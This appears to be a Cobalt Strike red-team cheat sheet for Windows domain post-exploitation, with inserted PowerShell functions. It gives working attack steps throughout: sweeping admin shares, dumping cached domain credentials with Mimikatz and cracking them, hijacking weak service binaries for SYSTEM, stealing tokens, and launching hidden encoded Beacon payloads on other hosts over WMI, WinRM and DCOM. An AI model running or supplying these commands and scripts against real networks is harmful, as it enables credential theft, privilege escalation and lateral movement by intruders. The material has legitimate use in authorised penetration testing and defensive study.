
CobaltStrike Cheat Sheet
User Integrity Context Methods:

Determine Integrity Mode:
- shell whoami /groups -- high integrity if "Mandatory Label\High Mandatory Level" is listed; "Medium Mandatory Level" means a filtered (UAC) token
- getuid -- Beacon prints the current token's user; "(admin)" in that output, and the asterisk (*) next to the user in the Beacon list, mark a high-integrity session
Locate User High-Integrity Access on Host(s):
- powershell-import /root/cobaltstrike/scripts/PowerSploit/Recon/PowerView.ps1
- powershell Invoke-FindLocalAdminAccess -- returns the domain hosts on which the current user (or token) is a local administrator
Determine High-Integrity on Remote Host(s):
- shell dir \\[host]\c$ -- a directory listing means local admin on that host; "Access is denied" means no (the C$ admin share is only readable by the target's local Administrators)
Obtain High-Integrity on Remote Host(s):
- shell net use \\[host]\c$ /user:[domain]\[user] [password] -- maps the admin share with explicit creds (run via shell; Beacon's own net module has no "use" command)
- spawnas [domain]\[user] [password] [listener] -- spawns a new Beacon as that user; needs the plaintext password and the listener name
- make-token [domain]\[user] [password] -- network-only logon token (same idea as runas /netonly): local integrity does not change, but anything touching a remote host authenticates as that user
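Added example, not from this cheat sheet or from PowerView: the C$ check above done across a list of hosts from the current token, distinguishing "access denied" (no local admin) from a host that is simply unreachable on TCP/445. Host names are constructed placeholders.

```powershell
# Added example (not from the cheat sheet): probe the C$ admin share on several hosts.
# The share is only listable by members of the target's local Administrators group,
# so a successful listing == local admin with the current (or make-token) credentials.
function Test-AdminShareAccess {
    param(
        [Parameter(Mandatory)] [string[]] $ComputerName,
        [int] $TimeoutMs = 2000
    )
    foreach ($target in $ComputerName) {
        # Check TCP/445 first so an unreachable host is not reported as "denied"
        $tcp = New-Object System.Net.Sockets.TcpClient
        try     { $up = $tcp.ConnectAsync($target, 445).Wait($TimeoutMs) }
        catch   { $up = $false }
        finally { $tcp.Dispose() }
        if (-not $up) {
            [pscustomobject]@{ Host = $target; LocalAdmin = $null; Reason = 'TCP/445 unreachable' }
            continue
        }
        try {
            [void](Get-ChildItem -LiteralPath "\\$target\C$" -ErrorAction Stop)
            [pscustomobject]@{ Host = $target; LocalAdmin = $true; Reason = 'C$ listing succeeded' }
        } catch {
            $denied = $_.CategoryInfo.Category -eq 'PermissionDenied'
            $reason = if ($denied) { 'access denied' } else { $_.Exception.Message }
            [pscustomobject]@{ Host = $target; LocalAdmin = $false; Reason = $reason }
        }
    }
}

# Placeholder host names; run after make-token to test the injected credentials
Test-AdminShareAccess -ComputerName 'dc01', 'file01', 'ws-42' | Format-Table -AutoSize
```

Run it from a Beacon with powershell-import / powershell, or from a runas /netonly PowerShell; every probe is an SMB logon that lands in the targets' security logs (4624/4625), so keep the host list short.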
Identify Domain Controllers:
- net dclist -- Beacon's own net module; lists all DCs in the Beacon's domain
- shell net view /DOMAIN -- lists the domain names visible from this host
- shell nltest /dclist:[domain] -- lists the DCs for [domain]
- x86 Beacon on 64-bit Windows: shell c:\windows\sysnative\nltest /dclist:[domain] -- sysnative bypasses WOW64 file redirection so the 32-bit Beacon reaches the 64-bit nltest.exe (an x64 Beacon uses the plain command; sysnative does not exist for 64-bit processes)
- shell nslookup [dc-host-name] -- resolves the DC's IP
Misc TTPs:

Locate Sensitive Information:
- powershell-import /root/cobaltstrike/scripts/PowerSploit/Recon/PowerView.ps1
- powershell Invoke-ShareFinder -CheckShareAccess -- lists shares on domain hosts; -CheckShareAccess keeps only those the current user can read
Using Mimikatz to Suspend Services:
- ps -- locate the PID of the service process to suspend
- mimikatz process::suspend /pid:[svc-PID] -- freezes every thread of the process; sc query still reports the service as RUNNING
- mimikatz process::resume /pid:[svc-PID] -- resume before leaving, a service left suspended is an obvious artifact
Mimikatz Dump Cached Creds:
- mimikatz !lsadump::cache -- the ! prefix makes Beacon elevate to SYSTEM first (needs a high-integrity session); dumps the MS Cache v2 (DCC2) hashes of domain users who have logged on to this host
- Crack with hashcat mode 2100; hashcat expects each line as $DCC2$10240#[username]#[hash]
Integrity Context Theft Methods:

Locate Privesc Opportunities:
- powershell-import /root/cobaltstrike/artifact/PowerSploit/Privesc/PowerUp.ps1
- powershell Invoke-AllChecks -- runs every PowerUp check (service permissions, service binary permissions, unquoted service paths, AlwaysInstallElevated, etc.)
- Identify opportunities in the output: the abuse below needs a service whose configuration the current user may change
Weak Service Abuses:
- Copy the weak service's name from the Invoke-AllChecks output (to temp.txt)
- Generate the payload: Attacks > Packages > Windows Executable (S), output type "Windows Service EXE", listener = SMB Beacon (a regular EXE is not a service binary; the SCM terminates it when it fails to report back as a service, error 1053)
- cd c:\users\[user] -- any path where the current user has read/write/execute
- upload [/path/to/svc.exe]
- shell sc config [Weak-svc] binpath= c:\users\[user]\svc.exe -- needs SERVICE_CHANGE_CONFIG on the service; note the space after "binpath="
- shell sc stop [Weak-svc] -- wait until sc query reports STOPPED (skip if the service was not running)
- shell sc start [Weak-svc] -- wait 5-10 sec; the service runs the SMB Beacon as the service account (usually SYSTEM)
- link 127.0.0.1 -- from the parent Beacon, connect to the SMB Beacon now listening on the local named pipe (use the host name, e.g. dc01, when the service was reconfigured on a remote host)
- Afterwards restore the original binpath= and start the service again, or the host is left with a broken service
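Added example, not from this cheat sheet or from PowerUp: first, the check the procedure above depends on, listing services whose DACL lets the current token change the binary path (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE or GENERIC_ALL); then the sc config / stop / start sequence waiting on the real SCM state instead of a blind sleep, returning the original binpath so it can be restored. Service and file names are placeholders.

```powershell
# Added example (not from the cheat sheet). Part 1: which services can this token reconfigure?
function Get-ModifiableService {
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mine = @($me.User.Value) + ($me.Groups | ForEach-Object { $_.Value })
    # SERVICE_CHANGE_CONFIG | WRITE_DAC | WRITE_OWNER | GENERIC_WRITE | GENERIC_ALL
    $mask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000
    foreach ($svc in Get-CimInstance Win32_Service) {
        # "sc sdshow" prints the service security descriptor as SDDL on a line starting with D:
        $sddl = (& sc.exe sdshow $svc.Name | Where-Object { $_ -match '^\s*D:' } | ForEach-Object { $_.Trim() }) -join ''
        if (-not $sddl) { continue }
        try { $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl) } catch { continue }
        foreach ($ace in $sd.DiscretionaryAcl) {
            if (-not ($ace -is [System.Security.AccessControl.CommonAce])) { continue }
            if ($ace.AceType -ne 'AccessAllowed') { continue }
            if ($mine -notcontains $ace.SecurityIdentifier.Value) { continue }
            if (($ace.AccessMask -band $mask) -eq 0) { continue }
            $who = try { $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { $ace.SecurityIdentifier.Value }
            [pscustomobject]@{
                Service    = $svc.Name
                RunsAs     = $svc.StartName
                State      = $svc.State
                GrantedTo  = $who
                AccessMask = ('0x{0:X}' -f $ace.AccessMask)
            }
            break
        }
    }
}

# Part 2: point the service at the uploaded service EXE and restart it, waiting on the SCM.
function Invoke-ServiceBinarySwap {
    param(
        [Parameter(Mandatory)] [string] $ServiceName,
        [Parameter(Mandatory)] [string] $NewBinaryPath,   # e.g. C:\Users\user\svc.exe (placeholder)
        [int] $TimeoutSec = 30
    )
    $svc      = Get-Service -Name $ServiceName -ErrorAction Stop
    $original = (Get-CimInstance Win32_Service -Filter "Name='$ServiceName'").PathName
    # sc.exe needs "binpath=" and the value as two separate arguments (the space after "=")
    & sc.exe config $ServiceName binpath= "$NewBinaryPath" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "sc config failed (exit $LASTEXITCODE): no SERVICE_CHANGE_CONFIG on $ServiceName?" }
    if ($svc.Status -eq 'Running') {
        & sc.exe stop $ServiceName | Out-Null
        $svc.WaitForStatus('Stopped', [TimeSpan]::FromSeconds($TimeoutSec))   # throws on timeout
    }
    & sc.exe start $ServiceName | Out-Null
    try { $svc.WaitForStatus('Running', [TimeSpan]::FromSeconds(10)) } catch { }
    $svc.Refresh()
    # Keep OriginalBinPath: restore it with  sc config <svc> binpath= "<OriginalBinPath>"  when done
    [pscustomobject]@{ Service = $ServiceName; Status = $svc.Status; OriginalBinPath = $original }
}

Get-ModifiableService | Format-Table -AutoSize
# Invoke-ServiceBinarySwap -ServiceName 'WeakSvc' -NewBinaryPath 'C:\Users\user\svc.exe'
```

Get-ModifiableService reports what the token it runs under can do, so run it from the same Beacon (same integrity level) you will abuse the service from; a filtered medium-integrity admin token and the elevated one give different answers.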
Token Theft (requires a high-integrity (*) Beacon):
- ps -- list processes; locate a PID running as the user you want (e.g. a domain admin's session)
- steal_token [pid] -- Beacon impersonates that process's primary token
- perform action(s) within the Beacon: the stolen token is used for network authentication and for child processes Beacon starts
- rev2self -- drops the impersonated token and reverts to the Beacon's original user context
WMI Methods:

Deploy Beacon:
- shell wmic /user:"[domain]\[user]" /password:"[password]" /node:[target-ip] process call create "cmd.exe /c [ps1liner-text]" -- WMI rides on DCOM (TCP 135 plus a dynamic RPC port); use straight quotes, and note the password lands in the process command line

WinRM (Remote PS Mgt) Methods:
- Look for port 5985 (HTTP) or 5986 (HTTPS) -- WinRM default ports; the current token must be a local admin (or in Remote Management Users) on the target

Deploy Beacon:
- powershell Invoke-Command -ComputerName [Tgt-host] -ScriptBlock { paste ps1liner or cmd here... } -- Note: the braces are required; everything inside the script block runs on the target, and Invoke-Command blocks until that command line exits

Inject MimiKatz:
- powershell-import /root/cobaltstrike/scripts/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
- powershell Invoke-Mimikatz -ComputerName [Tgt-host] -- Note: check the dumped hashes/creds against View > Credentials in the Cobalt Strike client and add any that are missing manually
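Added example, not from this cheat sheet: the WMI and WinRM deployment steps above as one function that picks whichever transport is actually open on the target, runs the supplied command line there with explicit credentials, and reports the result, so a closed port is not mistaken for a bad credential. Host name, account and one-liner are placeholders.

```powershell
# Added example (not from the cheat sheet): run a command line remotely over WinRM (5985)
# if it is open, otherwise over WMI/DCOM (135), using an explicit credential.
function Invoke-RemoteCommandLine {
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [string] $CommandLine,    # e.g. the PowerShell one-liner Beacon generated
        [Parameter(Mandatory)] [pscredential] $Credential,
        [int] $TimeoutMs = 3000
    )
    function Test-Port([string] $h, [int] $p) {
        $c = New-Object System.Net.Sockets.TcpClient
        try { $c.ConnectAsync($h, $p).Wait($TimeoutMs) } catch { $false } finally { $c.Dispose() }
    }
    if (Test-Port $ComputerName 5985) {
        # WinRM: the script block runs on the target. Start-Process -PassThru returns the new PID
        # instead of blocking the session for as long as the one-liner keeps running.
        $pid = Invoke-Command -ComputerName $ComputerName -Credential $Credential -ScriptBlock {
            param($cl) (Start-Process -FilePath cmd.exe -ArgumentList "/c $cl" -PassThru).Id
        } -ArgumentList $CommandLine
        return [pscustomobject]@{ Host = $ComputerName; Transport = 'WinRM/5985'; Result = "PID=$pid" }
    }
    if (Test-Port $ComputerName 135) {
        # WMI over DCOM: Win32_Process.Create returns at once; ReturnValue 0 means the process started
        $opt = New-CimSessionOption -Protocol Dcom
        $s   = New-CimSession -ComputerName $ComputerName -Credential $Credential -SessionOption $opt
        try {
            $r = Invoke-CimMethod -CimSession $s -ClassName Win32_Process -MethodName Create `
                     -Arguments @{ CommandLine = "cmd.exe /c $CommandLine" }
            return [pscustomobject]@{ Host = $ComputerName; Transport = 'WMI/DCOM';
                                      Result = "ReturnValue=$($r.ReturnValue) PID=$($r.ProcessId)" }
        } finally { Remove-CimSession $s }
    }
    [pscustomobject]@{ Host = $ComputerName; Transport = 'none'; Result = '5985 and 135 both closed or filtered' }
}

$cred = Get-Credential 'CORP\admin'    # placeholder account
Invoke-RemoteCommandLine -ComputerName 'ws-42' -Credential $cred `
    -CommandLine 'powershell -nop -w hidden -enc <base64 from Beacon>'
```

Both transports run the command line under the supplied account on the target; a non-zero Win32_Process.Create ReturnValue (e.g. 2 = access denied) or a WinRM "Access is denied" error means the account is not a local admin there, not that the payload failed.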
.NET Remote Code Execution Method (DCOM via PS):

Set User Context on Remote Host:
- PS> runas /netonly /user:[domain]\[user] "powershell.exe" -- the new PowerShell uses these creds for network authentication only (local context unchanged); the user must be a local admin on the target for remote DCOM activation

Execute Code on Remote Host (from the PS> prompt):
- $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880', "[target-ip]") -- ShellBrowserWindow CLSID, resolved for activation on the remote host (DCOM: TCP 135 plus a dynamic RPC port)
- $obj = [System.Activator]::CreateInstance($com)
- $obj.Document.Application.ShellExecute("cmd.exe", "/c [ps1liner]", "c:\windows\system32", $null, 0) -- arguments: file, parameters, working directory, verb, show-window (0 = hidden); the process starts on the target as the authenticating user
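Added example, not from this cheat sheet: the three lines above wrapped in a function that separates the two failures you actually hit (access denied from a non-admin account or DCOM filtered, versus the class not being activatable) and releases the COM object afterwards. The target name and the command line are placeholders.

```powershell
# Added example (not from the cheat sheet): ShellBrowserWindow DCOM ShellExecute with error handling.
function Invoke-DcomShellExecute {
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [string] $Arguments,   # what follows cmd.exe, e.g. "/c <ps1liner>"
        [string] $File = 'cmd.exe'
    )
    $clsid = [Guid]'C08AFD90-F2A1-11D1-8455-00A0C91F3880'   # ShellBrowserWindow
    $obj   = $null
    try {
        # Remote activation happens here; it authenticates with the current (runas /netonly) token
        $type = [Type]::GetTypeFromCLSID($clsid, $ComputerName)
        $obj  = [System.Activator]::CreateInstance($type)
        # file, parameters, working directory, verb, show-window (0 = SW_HIDE)
        $obj.Document.Application.ShellExecute($File, $Arguments, 'c:\windows\system32', $null, 0)
        return "$ComputerName : ShellExecute issued (no return value; verify the process on the target)"
    } catch [System.UnauthorizedAccessException] {
        return "$ComputerName : access denied (E_ACCESSDENIED) - not a local admin there, or DCOM filtered"
    } catch {
        return "$ComputerName : $($_.Exception.GetType().Name): $($_.Exception.Message)"
    } finally {
        if ($obj) { [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($obj) }
    }
}

Invoke-DcomShellExecute -ComputerName '192.168.1.1' -Arguments '/c powershell -nop -w hidden -enc <base64 from Beacon>'
```

ShellExecute returns nothing, so a "success" message only means the call went through; confirm the Beacon callback (or the process via WMI) before assuming the payload ran.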
Pentest-Zen (ExitC0de00c.com)
